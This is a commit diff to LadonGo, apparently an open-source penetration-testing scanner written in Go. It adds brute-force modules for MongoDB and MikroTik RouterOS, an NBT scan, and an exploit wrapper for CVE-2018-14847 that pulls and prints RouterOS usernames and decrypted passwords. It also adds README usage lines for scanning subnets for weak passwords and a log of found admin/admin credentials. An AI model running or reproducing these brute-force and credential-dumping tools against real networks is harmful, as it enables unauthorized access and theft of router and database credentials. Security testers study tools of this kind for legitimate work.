k8gege
diff --git a/‎Ladon.go
Lines changed: 52 additions & 8 deletions b/‎Ladon.go
Lines changed: 52 additions & 8 deletions
diff --git a/‎README.md
Lines changed: 13 additions & 4 deletions b/‎README.md
Lines changed: 13 additions & 4 deletions
diff --git a/‎ROUTEROSSCAN.Log
Lines changed: 3 additions & 0 deletions b/‎ROUTEROSSCAN.Log
Lines changed: 3 additions & 0 deletions
diff --git a/‎dic/dic.go
Lines changed: 42 additions & 8 deletions b/‎dic/dic.go
Lines changed: 42 additions & 8 deletions
diff --git a/‎example/rostest.go
Lines changed: 12 additions & 0 deletions b/‎example/rostest.go
Lines changed: 12 additions & 0 deletions
diff --git a/‎exp/CVE-2018-14847.go
Lines changed: 40 additions & 0 deletions b/‎exp/CVE-2018-14847.go
Lines changed: 40 additions & 0 deletions
@@ -15,6 +15,7 @@ import (
 	"github.com/k8gege/LadonGo/port"
 	"github.com/k8gege/LadonGo/http"
 	"github.com/k8gege/LadonGo/smb"
+	"github.com/k8gege/LadonGo/nbt"
 	"github.com/k8gege/LadonGo/ftp"
 	"github.com/k8gege/LadonGo/ssh"
 	"github.com/k8gege/LadonGo/mysql"
@@ -25,8 +26,10 @@ import (
 	"github.com/k8gege/LadonGo/dcom"
 	"github.com/k8gege/LadonGo/exp"
 	"github.com/k8gege/LadonGo/dic"
+	"github.com/k8gege/LadonGo/mongodb"
 	//"github.com/k8gege/LadonGo/tcp"
 	"github.com/k8gege/LadonGo/redis"
+	"github.com/k8gege/LadonGo/routeros"
 	"github.com/fatih/color"
 	"strings"
 	"log"
@@ -101,6 +104,7 @@ func Detection() {
 	fmt.Println("PortScan\t(Scan hosts open ports using TCP protocol)")	
 	fmt.Println("TcpBanner\t(Scan hosts open ports using TCP protocol)")	
 	fmt.Println("OxidScan \t(Using dcom Protocol enumeration network interfaces)")
+	fmt.Println("NbtInfo\t(Scan hosts open ports using NBT protocol)")	
 }
 
 func VulDetection() {
@@ -124,8 +128,10 @@ func BruteFor() {
 	fmt.Println("MysqlScan \t(Using Mysql Protocol to Brute-For 3306 Port)")
 	fmt.Println("MssqlScan \t(Using Mssql Protocol to Brute-For 1433 Port)")
 	fmt.Println("OracleScan \t(Using Oracle Protocol to Brute-For 1521 Port)")
+	fmt.Println("MongodbScan \t(Using Mongodb Protocol to Brute-For 27017 Port)")
 	fmt.Println("WinrmScan \t(Using Winrm Protocol to Brute-For 5985 Port)")
 	fmt.Println("SqlplusScan \t(Using Oracle Sqlplus Brute-For 1521 Port)")
+	fmt.Println("RouterOSScan \t(Using RouterOS API Brute-For 8728 Port)")
 }
 
 func RemoteExec() {
@@ -142,7 +148,7 @@ func Exploit() {
 	//} else{fmt.Println("\033[35m\nExploit:\033[0m")}
 	color.Magenta("\nExploit:")
 	fmt.Println("PhpStudyDoor\t(PhpStudy 2016 & 2018 BackDoor Exploit)")
-
+	fmt.Println("CVE-2018-14847\t(Export RouterOS Password 6.29 to 6.42)")
 }
 
 func Noping() {
@@ -156,7 +162,7 @@ func Noping() {
 }
 
 var isicmp bool
-var ver="3.6"
+var ver="3.8"
 func incIP(ip net.IP) {
 	for j := len(ip) - 1; j >= 0; j-- {
 		ip[j]++
@@ -251,6 +257,10 @@ func main() {
 			exp.PhpStudyDoorHelp()
 			os.Exit(0)
 		}
+		if SecPar == "CVE-2018-14847" {
+			exp.Cve2018_14847Help()
+			os.Exit(0)
+		}
 		if SecPar == "PHPSHELL" || SecPar == "PHPWEBSHELL" {
 			rexec.PhpShellHelp()
 			os.Exit(0)
@@ -285,6 +295,11 @@ func main() {
 			exp.PhpStudyDoorExp(os.Args[2],os.Args[3])
 			os.Exit(0)
 		}
+
+		if SecPar == "CVE-2018-14847" {
+			exp.Cve2018_14847Exp(os.Args[2],os.Args[3])
+			os.Exit(0)
+		}
 	} else if ParLen>4 {
 		SecPar := strings.ToUpper(os.Args[1])
 		fmt.Println("Load "+SecPar)
@@ -306,11 +321,18 @@ func main() {
 	//EndPar := os.Args[ParLen-1]
 	//Target := os.Args[ParLen-2]
 	fmt.Println("Targe: "+Target)
+	//log.Println("Start...")
+	fmt.Println("\nScanStart: "+time.Now().Format("2006-01-02 03:04:05"))	
 	if ParLen==3 {	
 		fmt.Println("Load "+EndPar)
+		ScanType := strings.ToUpper(EndPar)
+		if ScanType == "NBTINFO" {
+			nbt.Info(Target)
+			fmt.Println(" Finished: "+time.Now().Format("2006-01-02 03:04:05"))
+			os.Exit(0)
+		}
 	}
-	//log.Println("Start...")
-	fmt.Println("\nScanStart: "+time.Now().Format("2006-01-02 03:04:05"))	
+
 	ScanType := strings.ToUpper(EndPar)
 	if strings.Contains(Target, "/c")||strings.Contains(Target, "/C") {
 		CScan(ScanType,Target)
@@ -324,6 +346,18 @@ func main() {
 			for _, ip := range dic.TxtRead(Target) {
 				LadonScan(ScanType,ip)
 			}
+	} else if strings.ToUpper(Target)==strings.ToUpper("ip24.txt") {
+			for _, ip := range dic.TxtRead(Target) {
+				fmt.Println("\nC_Segment: "+ip)
+				fmt.Println("=============================================")
+				CScan(ScanType,ip)	
+			}
+	} else if strings.ToUpper(Target)==strings.ToUpper("ip16.txt") {
+			for _, ip := range dic.TxtRead(Target) {
+				fmt.Println("\nB_Segment: "+ip)
+				fmt.Println("=============================================")
+				BScan(ScanType,ip)	
+			}
 	} else if strings.ToUpper(Target)==strings.ToUpper("url.txt") {
 			for _, ip := range dic.TxtRead(Target) {
 				LadonUrlScan(ScanType,ip)
@@ -428,9 +462,9 @@ func AScan(ScanType string,Target string){
 
 func LadonScan(ScanType string,Target string) {
 	if ScanType == "GETEXFQND"||ScanType == "FINDEXCHANGE" {
-		vul.GetExFQND(Target)
-	} else if ScanType == "CVE-2021-26855" {
-		vul.CheckCVE_2021_26855(Target)
+		//vul.GetExFQND(Target)
+	//} else if ScanType == "CVE-2021-26855" {
+		//vul.CheckCVE_2021_26855(Target)
 	} else if ScanType == "CVE-2021-21972" {
 		vul.CheckCVE_2021_21972(Target)
 	} else if ScanType == "PINGSCAN" ||ScanType == "PING" {
@@ -516,6 +550,10 @@ func LadonScan(ScanType string,Target string) {
 		smb.MS17010(Target,3)
 	} else if ScanType == "SMBSCAN" {
 		smb.SmbScan(ScanType,Target)
+	} else if ScanType == "NBTINFO" {
+		//nbt.Info(ScanType,Target)
+		//nbt.Info(Target)
+		//nbt.Info()
 	} else if ScanType == "FTPSCAN" {
 		ftp.FtpScan(ScanType,Target)
 	} else if ScanType == "SMBGHOST"||ScanType == "CVE-2020-0796" {
@@ -526,14 +564,20 @@ func LadonScan(ScanType string,Target string) {
 		mysql.MysqlScan(ScanType,Target)
 	} else if ScanType == "MSSQLSCAN" {
 		mssql.MssqlScan(ScanType,Target)
+	} else if ScanType == "MONGODBSCAN" {
+		mgo.MongoScan(ScanType,Target)
 	} else if ScanType == "ORACLESCAN" {
-		//oracle.OracleScan(ScanType,Target)
+		oracle.OracleScan(ScanType,Target)
 	} else if ScanType == "SQLPLUSSCAN" {
 		oracle.SqlPlusScan(ScanType,Target)
 	} else if ScanType == "WINRMSCAN" {
 		winrm.WinrmScan(ScanType,Target)
 	} else if ScanType == "REDISSCAN" {
 		redis.RedisNullScan(ScanType,Target)
+	} else if ScanType == "ROUTEROSSCAN" {
+		routeros.RouterOSScan(ScanType,Target)
+	} else if ScanType == "CVE-2018-14847" {
+		exp.Cve2018_14847Exp(Target,"8291")
 	} else if ScanType == "HTTPBASICSCAN" ||ScanType == "BASICAUTHSCAN" ||ScanType == "401SCAN"  {
 		http.BasicAuthScan(ScanType,"http://"+Target)
 	} else {
 
@@ -4,7 +4,7 @@
 http://k8gege.org/Ladon/LadonGo.html<br>
 
 ### 简介
-LadonGo一款开源内网渗透扫描器框架，使用它可轻松一键探测C段、B段、A段存活主机、指纹识别、端口扫描、密码爆破、远程执行、高危漏洞检测等。3.6版本包含28个模块功能，高危漏洞检测MS17010、SmbGhost，远程执行SshCmd、WinrmCmd、PhpShell，10种协议密码爆破Smb/Ssh/Ftp/Mysql/Mssql/Oracle/Sqlplus/Winrm/HttpBasic/Redis，存活探测/信息收集/指纹识别OnlinePC、Ping、Icmp、SnmpScan，HttpBanner、HttpTitle、TcpBanner、WeblogicScan、OxidScan，端口扫描/服务探测PortScan。<br>
+LadonGo一款开源内网渗透扫描器框架，使用它可轻松一键探测C段、B段、A段存活主机、指纹识别、端口扫描、密码爆破、远程执行、高危漏洞检测等。3.8版本包含32个功能，高危漏洞检测MS17010、SmbGhost，远程执行SshCmd、WinrmCmd、PhpShell，10种协议密码爆破Smb/Ssh/Ftp/Mysql/Mssql/Oracle/Sqlplus/Winrm/HttpBasic/Redis/MongoDB/RouterOS，存活探测/信息收集/指纹识别NbtInfo、OnlinePC、Ping、Icmp、SnmpScan，HttpBanner、HttpTitle、TcpBanner、WeblogicScan、OxidScan，端口扫描/服务探测PortScan。<br>
 
 ### 开发环境
 OS: Kali 2019 X64<br>
@@ -27,7 +27,7 @@ T3Scan |           (Using T3 Protocol Scan Weblogic hosts)
 PortScan |         (Scan hosts open ports using TCP protocol)
 TcpBanner |        (Scan hosts open ports using TCP protocol)
 OxidScan |         (Using dcom Protocol enumeration network interfaces)
-
+NbtInfo |        (Scan hosts open ports using NBT protocol)
 
 #### VulDetection
 
@@ -37,7 +37,9 @@ MS17010 |          (Using SMB Protocol to detect MS17010 hosts)
 SmbGhost |         (Using SMB Protocol to detect SmbGhost hosts)
 CVE-2021-21972 |   (Check VMware vCenter 6.5 6.7 7.0 Rce Vul)
 CVE-2021-26855 |   (Check CVE-2021-26855 Microsoft Exchange SSRF)
-
+CVE-2018-14847 |   (Export RouterOS Password 6.29 to 6.42)
+ 
+ 
 #### BruteForce
 
  . | . 
@@ -49,6 +51,7 @@ FtpScan |          (Using FTP Protocol to Brute-For 21 Port)
 MysqlScan |        (Using Mysql Protocol to Brute-For 3306 Port)
 MssqlScan |        (Using Mssql Protocol to Brute-For 1433 Port)
 OracleScan |       (Using Oracle Protocol to Brute-For 1521 Port)
+MongodbScan |       (Using Mongodb Protocol to Brute-For 27017 Port)
 WinrmScan |        (Using Winrm Protocol to Brute-For 5985 Port)
 SqlplusScan |      (Using Oracle Sqlplus Brute-For 1521 Port)
 RedisScan |      (Using Redis Protocol to Brute-For 6379 Port)
@@ -171,6 +174,9 @@ Ladon 192.168.1.8/24 MysqlScan<br>
 扫描C段1521端口Oracle服务器弱口令<br>
 Ladon 192.168.1.8/24 OracleScan<br>
 
+扫描C段27017端口MongoDB服务器弱口令<br>
+Ladon 192.168.1.8/24 MongodbScan<br>
+
 扫描C段1521端口Oracle服务器弱口令<br>
 Ladon 192.168.1.8/24 SqlplusScan<br>
 
@@ -180,6 +186,9 @@ Ladon 192.168.1.8/24 WinrmScan<br>
 扫描C段6379端口Redis服务器空口令<br>
 Ladon 192.168.1.8/24 RedisScan<br>
 
+扫描C段8728端口RouterOS路由器<br>
+Ladon 192.168.1.8/24 RouterOSScan<br>
+
 ##### 远程命令执行
 
 ```Bash
@@ -264,7 +273,7 @@ http://k8gege.org/Download/LadonGo.rar
 
 历史版本: https://github.com/k8gege/Ladon/releases<br>
 7.0版本：http://k8gege.org/Download<br>
-7.8版本：K8小密圈<br>
+8.6版本：K8小密圈<br>
 
 
 <div style="text-align: center; width: 710px; border: green solid 0px;">
 
@@ -0,0 +1,3 @@
+2021/05/08 02:56:40 Found: 192.168.250.110 8728 admin admin ISOK
+2021/05/08 02:57:41 Found: 192.168.250.110 8728 admin admin ISOK
+2021/05/08 02:57:49 Found: 192.168.250.110 8728 admin admin ISOK
@@ -18,6 +18,19 @@ if IsExist("userpass.txt") {
 return false
 }
 
+func PwdIsExist() bool{
+if IsExist("userpass.txt") {
+	return true
+}
+if IsExist("user.txt") {
+	return true
+}
+if IsExist("pass.txt") {
+	return true
+}
+return false
+}
+
 func IsExist(f string) bool {
 	_, err := os.Stat(f)
 	return err == nil || os.IsExist(err)
@@ -28,7 +41,11 @@ func TxtRead(filename string) (lines []string) {
 	if err != nil {
 		fmt.Println("Open ",filename,"error, %v", err)
 	}
-
+	fi,_:=os.Stat(filename)
+	if fi.Size() ==0 {
+	fmt.Println("Error: "+filename+" is null!")
+	os.Exit(1)
+	}
 	defer file.Close()
 	scanner := bufio.NewScanner(file)
 	scanner.Split(bufio.ScanLines)
@@ -42,11 +59,16 @@ func TxtRead(filename string) (lines []string) {
 	return lines
 }
 func UserDic() (users []string) {
-	file, err := os.Open("user.txt")
+	dicname:="user.txt"
+	file, err := os.Open(dicname)
 	if err != nil {
-		fmt.Println("Open user.txt error, %v", err)
+		fmt.Println("Open "+dicname+" error, %v", err)
+	}
+	fi,_:=os.Stat(dicname)
+	if fi.Size() ==0 {
+	fmt.Println("Error: "+dicname+" is null!")
+	os.Exit(1)
 	}
-
 	defer file.Close()
 	scanner := bufio.NewScanner(file)
 	scanner.Split(bufio.ScanLines)
@@ -61,9 +83,15 @@ func UserDic() (users []string) {
 }
 
 func PassDic() (password []string) {
-	file, err := os.Open("pass.txt")
+	dicname:="pass.txt"
+	file, err := os.Open(dicname)
 	if err != nil {
-		fmt.Println("Open pass.txt error, %v", err)
+		fmt.Println("Open "+dicname+" error, %v", err)
+	}
+	fi,_:=os.Stat(dicname)
+	if fi.Size() ==0 {
+	fmt.Println("Error: "+dicname+" is null!")
+	os.Exit(1)
 	}
 
 	defer file.Close()
@@ -80,9 +108,15 @@ func PassDic() (password []string) {
 }
 
 func UserPassDic() (userpass []string) {
-	file, err := os.Open("userpass.txt")
+	dicname:="userpass.txt"
+	file, err := os.Open(dicname)
 	if err != nil {
-		fmt.Println("Open userpass.txt error, %v", err)
+		fmt.Println("Open "+dicname+" error, %v", err)
+	}
+	fi,_:=os.Stat(dicname)
+	if fi.Size() ==0 {
+	fmt.Println("Error: "+dicname+" is null!")
+	os.Exit(1)
 	}
 
 	defer file.Close()
 
@@ -0,0 +1,12 @@
+package main
+//Ladon Scanner for golang 
+//Author: k8gege
+//K8Blog: http://k8gege.org/Ladon
+//Github: https://github.com/k8gege/LadonGo
+import (
+	"github.com/k8gege/LadonGo/routeros"
+	"fmt"
+)
+func main() {
+fmt.Println(routeros.RouterOSAuth("192.168.250.110","8728","admin","admin"))
+}
@@ -0,0 +1,40 @@
+package exp
+//Ladon Scanner for golang 
+//Author: k8gege
+//K8Blog: http://k8gege.org/Ladon
+//Github: https://github.com/k8gege/LadonGo
+//Date:2021.4.21
+import (
+	"fmt"
+	//"log"
+)
+
+var ip string
+var port string
+
+var Cve2018_14847Help = func () {
+    fmt.Println("Usage: Ladon CVE-2018-14847 ip port")
+	fmt.Println("Example:")
+	fmt.Println("Ladon CVE-2018-14847 192.168.1.8 8291")
+	fmt.Println("Ladon 192.168.1.8/24 CVE-2018-14847")
+	fmt.Println("Ladon 192.168.1.8/b  CVE-2018-14847")
+	fmt.Println("Ladon ip.txt CVE-2018-14847")
+}
+
+func Cve2018_14847Exp(ip,port string) {
+
+	var data []byte
+	var err error
+	if data, err = connectToRouter(ip, port); err != nil {
+		//log.Fatal(err)
+	}
+	users, err := getUsersAandDecryptPasswords(data)
+	if err != nil {
+		//log.Fatal(err)
+	}
+	//fmt.Printf("Checking... %s\n",ip)
+	for _, u := range users {
+		//fmt.Printf("Username: %s Password: %s\n", u.username, u.pass)
+		fmt.Printf("%s\t%s %s\n",ip, u.username, u.pass)
+	}
+}
Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,3 @@`
	`1`	`+2021/05/08 02:56:40 Found: 192.168.250.110 8728 admin admin ISOK`
	`2`	`+2021/05/08 02:57:41 Found: 192.168.250.110 8728 admin admin ISOK`
	`3`	`+2021/05/08 02:57:49 Found: 192.168.250.110 8728 admin admin ISOK`